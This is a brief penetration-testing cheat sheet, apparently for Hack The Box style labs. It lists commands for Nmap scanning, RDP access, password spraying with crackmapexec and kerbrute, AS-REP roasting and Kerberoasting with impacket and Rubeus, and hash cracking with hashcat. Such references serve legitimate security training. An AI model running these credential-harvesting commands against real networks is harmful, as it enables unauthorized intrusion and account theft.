Powered by

Cheatsheet

Nmap

sudo nmap -p- -A -Pn -v --open $IP
sudo nmap -sS -sV -T4 -oN nmap_default.txt <IP>

Edit /etc/hosts file

echo "10.129.76.146 sea.htb" | sudo tee -a /etc/hosts

Connecting to RDP

xfreerdp3 /u:<username> /d:<domain> /p:<pwd> /v:<IP>
xfreerdp /cert-ignore /u:<uname> /d:<domain> /p:<pwd> /v:<IP>

Hashcat

https://hashcat.net/wiki/doku.php?id=example_hashes

hashcat -m <number> hash wordlists.txt --force

Active Directory

Password Spraying

Crackmapexec - check if the output shows 'Pwned!'

crackmapexec smb <IP or subnet> -u users.txt -p 'pass' -d <domain> --continue-on-success
Kerbrute
kerbrute passwordspray -d corp.com .\usernames.txt "pass"

AS-REP Roasting

Hash of AS-REP Roastable accounts

impacket-GetNPUsers -dc-ip <DC-IP> <domain>/<user>:<pass> -request

Kerberoasting

dumping from compromised windows host, and saving with customname

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast #dumping from compromised windows host, and saving with customname

impacket-GetUserSPNs -dc-ip <DC-IP> <domain>/<user>:<pass> -request #from kali machine

hashcat -m 13100 hashes.txt wordlist.txt --force # cracking hashes

© Annsh